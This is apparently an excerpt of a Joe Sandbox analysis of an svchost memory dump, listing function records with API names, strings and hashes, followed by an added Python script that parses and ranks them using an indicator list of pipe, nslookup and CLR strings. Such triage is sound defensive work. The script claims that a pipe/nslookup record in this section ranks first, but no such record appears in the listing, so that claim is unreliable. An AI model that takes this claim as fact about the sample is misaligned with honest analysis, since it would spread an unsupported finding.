                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: f129c3fc5f3b662ea668e09758b84b8f033844573d7d34b4ab39db878069e53c
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: 0DC15C76711A0286EBA2EF2AD2817A973B9F798FC0F559116CB0953B50EF36D891C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction ID: 1f5fc437b6f6b040f1c1f5e1f9ef48ded882a6a98814d20cddb07468d4b61540
                            • Opcode Fuzzy Hash: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction Fuzzy Hash: 5ED1BA76208B8981DA70EB5AE59039AB7B4F3C8F88F504156EE8D57BA9DF3DC541CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: f1d255924cd9de6f150f5eaa9541634f8d809c18518ffb59a966a005f029fad3
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: 2DF08271711A4081FF44BF31E9953E97368EB48F45F452015A90B4A360DF2ED488C300
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction ID: e57206d9fcccc70b07720b9a0e68ca42caeba63aaae8028bc7e406438b64ce84
                            • Opcode Fuzzy Hash: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction Fuzzy Hash: EB02CC32219B8586EB60DB69F59039AB7B4F3C4B94F104015EA8E97BA9DF7DC444CF00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: b17619c51a2d723de84ae150da3458008b5e72df293350c3a24b6ae6c818fbae
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 7F81DF32710A1099FB11BFB5CAA03ED37A8F744F98F445216DE0A53B96EF36A445C710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction ID: 9b987869a49914519cdeff562934dfb1584c993c188d3c71289ed5ab85880a73
                            • Opcode Fuzzy Hash: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction Fuzzy Hash: 1B610A32618B81C6E760EF65E65039AB7A8F388B44F100116FA8D97BA8DF7EC540CF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: db4cdb93a7890c039f95340cbe20adbbc2898413306fad0270481d9de2bdf508
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: 57117332A58A4102F7687238F7563ED3348AB55B74F454634BF665BFE6CF2B8A81D100
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 7789d84716f6884de17b4313baa740627942af4b8a20b46fa79230296547007b
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 1111C272A50A4101F7643238E75A3E93749AB54B74F580724AF7B26FEBAF1BE851C210
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: 3a784736c33743646cbbaf27caad2e1a7f7792e00d0f17f6e74a0644b38bcbf9
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: AC617A3260064482FAA8BB38A7903EF7BB9A794F85F144419FA4A177A5DF77CB41C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: ea92bbebb3f69a50aed456c44c937607cc1ecbd232a5df6af0add1d9190539f2
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: 5541DE7260078481EB35BB2296403FB7BA8E355FD4F584252FA99077E6CF2AC781C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValue
                            • String ID: d
                            • API String ID: 918324718-2564639436
                            • Opcode ID: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction ID: 57a6385722d53f893f33705b4f2bf82e5598bd759d0b585dc7b0c17cff349377
                            • Opcode Fuzzy Hash: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction Fuzzy Hash: 75415972208B8086E761DB21F98139FB3A9F3C9B80F544519EB9953B18DF39D465CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: 5579c5a5454cda3248de12dc7cb98da762c6a7dcd44174cbc07839beff5aa395
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 9541C032714A8082EB20AF39F9543EA77A8F798B84F844121EE4D87788EF3DE441C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 73b5c6d5c4e7a52a48ddfa72b9ee33fb79f12bdb05eb6c26e39e188af0965454
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: C2111736608B8086D764DB66F58029AB7A8F7C9BC0F544126EECD93B29CF39C454CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: 3b5cb8bbcfdcd9e187096b07bd16b8b84a64393a13f471871762df021645d6d0
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: DC11F832614B8582EB219F25F540399B7A9F788F94F184221DFC917B64EF3AC551CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: 47b982454cf8a7bfd15413bf3e188b5b21d0983692a092236e39e49e020008cd
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: 63F0A735710B9092EB08BF61F6907D93368FB48FC0F485025D95927B65CF3AD485C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: 7ac1bd62ef79e3474dee08fbfb5f13e05748c7df1620033be10d7825011cecf7
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: 5EE0D87561064292FB187B70FB543E9332AAB88F80F8C5022D91907375CF3ED888C700
                            Uniqueness

                            Uniqueness Score: -1.00%
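The function records above all follow one layout (the "Source File" line with its Offset, the "Snapshot File" name, the "$"-joined API ID, the String ID, the hash fields and the "Uniqueness Score"), and the same facts are repeated in several of those fields: the hex process index 00000031 and the base address in the .sdmp name, the decimal index 49 and the lowercase base in the snapshot name. The following is an added example, not part of the report and not Joe Sandbox tooling: a parser for this record layout that cross-checks those fields against each other and orders records by the string fragments a triager would look at first. The two sample records are copied from this section; the indicator list, the function names and the scoring are assumptions made for the example.

```python
"""Parse the Joe Sandbox IDA-plugin function records listed in this report
section and rank them for triage.  Added example, not Joe Sandbox code: the
record layout is taken from the report text; the indicator list is an assumption."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
# Constructed input: two records from this section, in the exported layout.
SAMPLE = r"""APIs
Strings
Memory Dump Source
• Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
Similarity
• API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
• String ID: \\.\pipe\$nslook
• API String ID: 1773417096-2374292202
• Instruction Fuzzy Hash: 6E31BF3660468682FB64BF35EA943ED7368FB40F84F544026CE0A63BA4DF3AD509D708
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Instruction Fuzzy Hash: 57117332A58A4102F7687238F7563ED3348AB55B74F454634BF665BFE6CF2B8A81D100
Uniqueness

Uniqueness Score: -1.00%
"""
BULLET = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
SNAPSHOT = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_")

@dataclass
class FuncRecord:
    fields: Dict[str, str]       # every "• key: value" bullet, verbatim
    uniqueness: Optional[float]  # "Uniqueness Score" as a float, else None

    def offset(self) -> str:
        m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", self.fields.get("Source File", ""))
        return m.group(1) if m else ""

    def api_names(self) -> List[str]:
        # '$' joins API-name fragments; a fragment is not always one clean name.
        return [t for t in self.fields.get("API ID", "").split("$") if t]

    def string_id(self) -> str:
        return self.fields.get("String ID", "")

def parse_records(text: str) -> List[FuncRecord]:
    """One record runs from 'Memory Dump Source' to 'Uniqueness Score'."""
    records: List[FuncRecord] = []
    fields: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            fields = {}
        elif line.startswith("Uniqueness Score:"):
            score = line.split(":", 1)[1].strip().rstrip("%")
            uniq = float(score) if re.fullmatch(r"-?\d+(\.\d+)?", score) else None
            records.append(FuncRecord(fields, uniq))
            fields = {}
        else:
            m = BULLET.match(line)
            if m:
                fields[m.group(1).strip()] = m.group(2).strip()
    return records

def consistent(rec: FuncRecord) -> bool:
    """The report states the same facts three times: the .sdmp name carries the
    hex process index, dump index and base address; 'Offset' repeats the base;
    the snapshot name carries the decimal indices and the lowercase base without
    leading zeros.  Cross-check them before reusing a record's hashes elsewhere."""
    parts = rec.fields.get("Source File", "").split(",")[0].split(".")
    snap = SNAPSHOT.match(rec.fields.get("Snapshot File", ""))
    off = rec.offset()
    if len(parts) < 4 or not snap or not off:
        return False
    return (parts[3].upper() == off.upper()
            and int(parts[0], 16) == int(snap.group(1))
            and int(parts[1], 16) == int(snap.group(2))
            and off.lstrip("0").lower() == snap.group(3))

# Assumed indicators for this sample: named pipe, nslookup, console handle, CLR.
INDICATORS = ("\\\\.\\pipe\\", "nslook", "CONOUT$", "mscoree.dll", "CorExitProcess")
def triage_score(rec: FuncRecord, indicators=INDICATORS) -> int:
    hay = rec.string_id().lower()
    return sum(1 for ind in indicators if ind.lower() in hay)

def rank(records: List[FuncRecord]) -> List[FuncRecord]:
    """Most indicator hits first; the stable sort keeps report order for ties."""
    return sorted(records, key=lambda r: -triage_score(r))
```

Run `rank(parse_records(SAMPLE))` on the full export of this section and the lstrcmpi/lstrcat/lstrcpy function with the `\\.\pipe\` and `nslook` strings comes out first, while the CRT routines (`_set_statfp`, `_invalid_parameter_noinfo`, `LCMapStringEx`, `FlsSetValue`) score zero and can be set aside. `consistent()` should be true for every record; a mismatch between the .sdmp name, the Offset and the snapshot name would mean the record was copied or merged from a different dump, so its fuzzy hashes should not be attributed to this memory region without checking.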